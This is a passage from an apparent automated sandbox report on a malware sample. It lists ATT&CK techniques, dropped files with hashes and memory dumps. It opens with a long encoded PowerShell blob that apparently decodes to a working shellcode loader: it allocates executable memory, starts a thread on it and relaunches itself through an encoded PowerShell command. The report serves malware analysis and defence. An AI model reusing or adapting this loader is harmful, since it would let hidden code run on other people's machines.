ACwAMAB4ADcANgAsADAAeABhADkALAAwAHgAOQAyACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgAYwAxACwAMAB4ADQAYQAsADAAeAA3AGUALAAwAHgAOQBhACwAMAB4AGYANAAsADAAeAA5ADQALAAwAHgAYQBiACwAMAB4ADgAZQAsADAAeABhADQALAAwAHgAMwA5ACwAMAB4AGQAYQAsADAAeAA1ADYALAAwAHgAMQBkACwAMAB4AGQANgAsADAAeABkAGMALAAwAHgAYgA4ACwAMAB4AGEAMgAsADAAeAAyADYALAAwAHgAOABmACwAMAB4AGUAZQAsADAAeABjAGEALAAwAHgAMwA0ACwAMAB4AGIAOQAsADAAeAA4ADYALAAwAHgAZQA5ACwAMAB4AGMANgAsADAAeAAxADAALAAwAHgAMQBkACwAMAB4ADIAZAAsADAAeAA0AGMALAAwAHgANQA3ACwAMAB4ADkANQAsADAAeABhADkALAAwAHgAYQBjACwAMAB4AGEANAAsADAAeAAyAGYALAAwAHgANwA1ACwAMAB4AGQAYgAsADAAeABjAGYALAAwAHgANgA4ACwAMAB4AGIANQAsADAAeAA3AGIALAAwAHgAZQA3ACwAMAB4AGUAMAAsADAAeABjADYALAAwAHgANwBiACwAMAB4ADAAOAAsADAAeABjADMALAAwAHgAMAAxACwAMAB4AGIANgAsADAAeABkADgALAAwAHgAMQA1ACwAMAB4ADQANAAsADAAeAA4AGUALAAwAHgAMABhACwAMAB4ADYAZQAsADAAeAA5ADAALAAwAHgAYwAwACwAMAB4ADYAMwAsADAAeABiAGMALAAwAHgAZAA4ACwAMAB4ADEAYwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAUQBpAHAAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFEAaQBwAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABRAGkAcAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEEARQBPACkAKQA7ACQAZgBkAEkAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAZQBpAHcAdAAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABlAGkAdwB0ACAAJABmAGQASQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABmAGQASQAgACQAZQAiADsAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2224

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\DEFA.tmp\DEFB.tmp\DEFC.bat

Filesize
8KB

MD5
b165bd278dba5b19d81ba2cd094ac137

SHA1
c3408b1b563d7cfc83907c0fbeab7dee8c6c1e65

SHA256
0bebb0ff617d53c10c9212b6851375a3e4dec5b7c161602f5582bc8930cdb03a

SHA512
af82d76f0ed87c1b93765ebbb2b14f0aad82fe2aef8021c3b828f2cf9141c51866d1d1c92f18fd83aaa6c7840db85ddb9ea9f1d95a085dcbbefd6f2533ff0931

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
dd757b6643482b07510a5565f17d3f57

SHA1
1c4774456cfe34dcaeddea9c117989dc53c4e9fe

SHA256
d64214c6c4578f7ba466ed2405d197d00001afb7aaffe5a3ca11e041d051d38d

SHA512
61e1f86a2d4e14a326cb3bcce0619318b49f3cb1d04995eccac96ab33bc1379498a6ed6d22582515b8285b5431c094891d0bfaf28cc417fd19993365b9425922

Download Submit
memory/2980-6-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

Filesize
4KB

Download
memory/2980-8-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/2980-7-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

Filesize
2.9MB

Download
memory/2980-13-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/2980-15-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/2980-16-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing